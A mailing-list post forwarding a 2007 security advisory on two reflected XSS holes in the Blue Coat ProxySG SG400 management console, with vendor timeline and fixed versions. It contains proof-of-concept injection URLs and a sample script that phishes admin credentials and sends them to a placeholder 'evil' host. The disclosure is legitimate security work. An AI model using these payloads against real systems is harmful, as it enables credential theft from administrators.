http://www.ISAserver.org ------------------------------------------------------- This is why I dislike web-based admin. The standard threats to any application protocol are enough (RPC protocols are especially fun). Adding any browser to the management process increases the attack surface far more than the "convenience" justifies, IMHO. -----Original Message----- From: research@xxxxxxxxxxxxxx [mailto:research@xxxxxxxxxxxxxx] Sent: Thursday, November 01, 2007 10:20 AM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: Two XSS on Blue Coat ProxySG Management Console PR07-29: Two XSS on Blue Coat ProxySG Management Console Vulnerability found: 23 July 2007 Vendor informed: 20 August 2007 Vulnerability fixed: 29 October 2007 Advisory publicly released: 1 November 2007 Severity: Medium Description: Blue Coat SG400 is vulnerable to a couple of XSS holes. Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_action/crl_format' / 'name' Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file' Notes: The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run. Successfully tested on: Model: Blue Coat SG400 Software SGOS 4.2.1.6 Software Release ID: 25173 Proof of concept #1: https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00 Injected payload: "<script>alert("XSS")</script>%00 Proof of concept #2: https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Injected payload: <script>alert("XSS")</script><!-- A neat payload to inject instead of a alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site). i.e.: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b </script><!-- Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties. Fixed in: 4.2.6.1, 5.2.2.5 References: http://www.procheckup.com/Vulnerability_2007.php http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com) ------------------------------------------------------ List Archives: //www.freelists.org/archives/isalist/ ISA Server Newsletter: http://www.isaserver.org/pages/newsletter.asp ISA Server Articles and Tutorials: http://www.isaserver.org/articles_tutorials/ ISA Server Blogs: http://blogs.isaserver.org/ ------------------------------------------------------ Visit TechGenix.com for more information about our other sites: http://www.techgenix.com ------------------------------------------------------ To unsubscribe visit http://www.isaserver.org/pages/isalist.asp Report abuse to listadmin@xxxxxxxxxxxxx